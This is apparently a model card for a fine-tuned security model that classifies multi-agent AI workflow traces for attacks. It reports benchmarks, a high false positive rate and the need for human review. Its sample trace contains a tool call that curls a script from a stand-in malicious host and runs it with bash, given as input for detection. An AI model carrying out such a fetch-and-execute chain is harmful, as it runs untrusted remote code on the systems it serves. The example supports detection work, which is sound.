---
license: apache-2.0
base_model: fdtn-ai/Foundation-Sec-8B-Instruct
tags:
- cybersecurity
- agentic-ai-security
- security
- llm-security
- owasp
- qlora
- fine-tuned
- trace-analysis
- multi-agent-security
- opentelemetry
model-index:
- name: Foundation-Sec-8B-Agentic-V4
  results:
  - task:
      type: question-answering
      name: Custom Cybersecurity MCQA
    metrics:
    - type: accuracy
      value: 74.29
      name: Overall Accuracy
      verified: true
    - type: accuracy
      value: 70.0
      name: Agentic AI Security
      verified: true
---

# agentic-safety-gguf

![License](https://img.shields.io/badge/License-Apache%202.0-green) ![Model Size](https://img.shields.io/badge/Model-8B%20params-orange) ![Training](https://img.shields.io/badge/Training-QLoRA-purple)

**Research Paper:** https://arxiv.org/abs/2601.00848

**Specialized security model for detecting temporal attack patterns in multi-agent AI workflows.**

Fine-tuned from Foundation-Sec-8B-Instruct (Llama 3.1 8B) on 80,851 curated examples plus 141 targeted augmentation examples, achieving **74.29% accuracy** on custom cybersecurity benchmarks, a **+31.43-point improvement** over the base model (p < 0.001).
## 🎯 Key Capabilities

✅ **Temporal Attack Pattern Detection**: Identifies malicious sequences across multi-step agent workflows
✅ **OpenTelemetry Trace Analysis**: Classifies workflow traces for OWASP Top 10 Agentic vulnerabilities
✅ **Security Knowledge Q&A**: Answers technical questions about agentic AI security, LLM threats, and MITRE ATT&CK
✅ **Multi-Agent Security**: Detects coordination attacks in distributed agent systems

## ⚠️ Critical Production Warning

**NOT production-ready for automated security decisions:**

- **False Positive Rate**: 66.7% on benign workflow traces
- **Trace Accuracy**: 30% overall (60% TPR, 0% TNR)
- **Root Cause**: Training data heavily skewed toward attacks (90% malicious)
- **Deployment**: **Human-in-the-loop oversight mandatory**; suitable for monitoring/alerting only, not automated blocking

See the research paper for detailed analysis and proposed V5 improvements.

## 📊 Performance Summary

| Benchmark | Base Model | agentic-safety-gguf | Improvement |
|-----------|------------|---------------------|-------------|
| **Custom MCQA Overall** | 42.86% | **74.29%** | **+31.43 pts** |
| Agentic AI Security | 40.0% | **70.0%** | +30.0 pts |
| Traditional Security | 44.0% | **76.0%** | +32.0 pts |
| MMLU Computer Security | - | **74.0%** | - |
| MMLU Security Studies | - | **72.24%** | - |

**Statistical Validation**: McNemar's χ² = 18.05, p < 0.001, Cohen's h = 0.65 (large effect)

**Iterative Training**: V2 baseline (80,851 examples) → V3 (+111 OWASP) → V4 (+30 adversarial) demonstrated the effectiveness of targeted augmentation.
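The reported effect size follows directly from the two accuracies in the table; a minimal sketch of the arithmetic (the McNemar discordant-pair counts `b` and `c` below are hypothetical placeholders for illustration, only the accuracies come from the table):

```python
import math

def cohens_h(p1: float, p2: float) -> float:
    """Cohen's h: effect size for the difference between two proportions."""
    return 2 * math.asin(math.sqrt(p1)) - 2 * math.asin(math.sqrt(p2))

# Accuracies from the benchmark table above
h = cohens_h(0.7429, 0.4286)
print(f"Cohen's h = {h:.2f}")  # ~0.65, conventionally a large effect

def mcnemar_chi2(b: int, c: int) -> float:
    """McNemar's chi-squared (no continuity correction) on paired outcomes.
    b = items only the fine-tuned model answered correctly,
    c = items only the base model answered correctly."""
    return (b - c) ** 2 / (b + c)

# Hypothetical discordant-pair counts, for illustration only
print(f"chi^2 = {mcnemar_chi2(25, 3):.2f}")
```

Reproducing the exact χ² = 18.05 requires the per-item results from the paper; the sketch only shows the shape of the calculation.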
## 🚀 Quick Start

```python
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

# Load model
model_name = "guerilla7/agentic-safety-gguf"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(
    model_name,
    torch_dtype=torch.bfloat16,
    device_map="auto"
)

# Security Q&A
messages = [
    {"role": "system", "content": "You are a cybersecurity expert specialized in agentic workflow security."},
    {"role": "user", "content": "What is indirect prompt injection in multi-agent systems?"}
]

inputs = tokenizer.apply_chat_template(
    messages, add_generation_prompt=True, return_tensors="pt"
).to(model.device)
outputs = model.generate(inputs, max_new_tokens=512, temperature=0.7, do_sample=True)
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(response)
```

### Analyzing Workflow Traces

```python
import json

trace = {
    "spans": [
        {"name": "user_request", "attributes": {"action": "fetch_emails"}},
        {"name": "tool_call", "attributes": {"tool": "curl", "url": "https://malicious.com/script.sh"}},
        {"name": "tool_call", "attributes": {"tool": "bash", "command": "script.sh"}}
    ]
}

prompt = f"""Analyze this trace for security threats:

{json.dumps(trace, indent=2)}

Classify as BENIGN, SUSPICIOUS, or MALICIOUS."""

# Use the model as above with this prompt
```

**⚠️ Warning**: The 66.7% FPR requires human review before taking action.
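Because the model answers in free text, downstream tooling has to extract the verdict before it can route an alert. A minimal sketch of such a parser (the function name, the earliest-label heuristic, and the `UNPARSEABLE` fallback are assumptions for illustration, not part of the released code):

```python
def parse_trace_verdict(response: str) -> str:
    """Extract the first BENIGN/SUSPICIOUS/MALICIOUS label from model output.

    Hypothetical helper: picks whichever label appears earliest in the
    response, and falls back to UNPARSEABLE so ambiguous outputs can be
    routed to human review rather than acted on automatically.
    """
    upper = response.upper()
    positions = {label: upper.find(label)
                 for label in ("MALICIOUS", "SUSPICIOUS", "BENIGN")}
    found = {label: pos for label, pos in positions.items() if pos != -1}
    if not found:
        return "UNPARSEABLE"  # send to a human, never auto-block
    return min(found, key=found.get)

print(parse_trace_verdict("Verdict: MALICIOUS. The curl->bash chain executes a remote script."))
# MALICIOUS
```

Given the FPR noted above, even a clean `MALICIOUS` parse should trigger an alert for review, not an automated response.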
## 📖 Use Cases

### ✅ Recommended

- Security research on agentic AI vulnerabilities
- Educational demonstrations (OWASP Top 10)
- Prototype development for security tools
- Knowledge assistance (74% MCQA accuracy)

### ❌ Not Recommended

- Production security monitoring without human oversight
- Automated security decisions (30% trace accuracy is insufficient)
- Mission-critical applications
- Regulatory compliance automation

## 🎓 Training Details

**Dataset**: 80,851 curated examples from 18 cybersecurity sources + 35,026 synthetic OpenTelemetry traces, augmented with 111 OWASP-focused + 30 adversarial examples via continuation training

**Complete dataset**: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf)

**Method**: QLoRA (4-bit NF4, rank 16, alpha 16)

**Hardware**: NVIDIA DGX Spark (ARM64, 128GB)

**Training**: V2 (1,500 steps, 6h 43m) → V3 (+500 steps) → V4 (+500 steps)

**Loss**: 3.68 → 0.52 (an 85.99% reduction)

See the research paper for the complete methodology, ablation studies, and statistical analysis.

## 📚 Resources

- **Dataset Repository**: [datasets/guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf)
- **Research Paper**: https://arxiv.org/abs/2601.00848
- **Training Scripts**: Complete QLoRA implementation, evaluation code, and GGUF quantization utilities

## 📄 Citation

```bibtex
@article{agentic-safety-gguf-2025,
  title={agentic-safety-gguf: Specialized Fine-Tuning for Agentic AI Security},
  year={2025},
  url={https://huggingface.co/guerilla7/agentic-safety-gguf}
}
```

## ⚖️ Limitations

1. **High False Positive Rate (66.7%)**: Unsuitable for production without human oversight
2. **Small Evaluation Sample**: 30-trace evaluation (±18% confidence intervals)
3. **Synthetic Data Bias**: 43% of the training data is synthetic
4. **ARM64-Specific**: Training validated on DGX Spark only
5. **No Commercial Comparison**: Not benchmarked against GPT-4/Claude

**Proposed V5 Solution**: A balanced dataset (80K benign + 80K malicious) targeting 30-50% FPR and 75-85% TPR. See the paper for the detailed roadmap.

## 📅 Updates

- **2025-12-29**: Initial release with V2/V3/V4 training artifacts and research paper

## License

Apache 2.0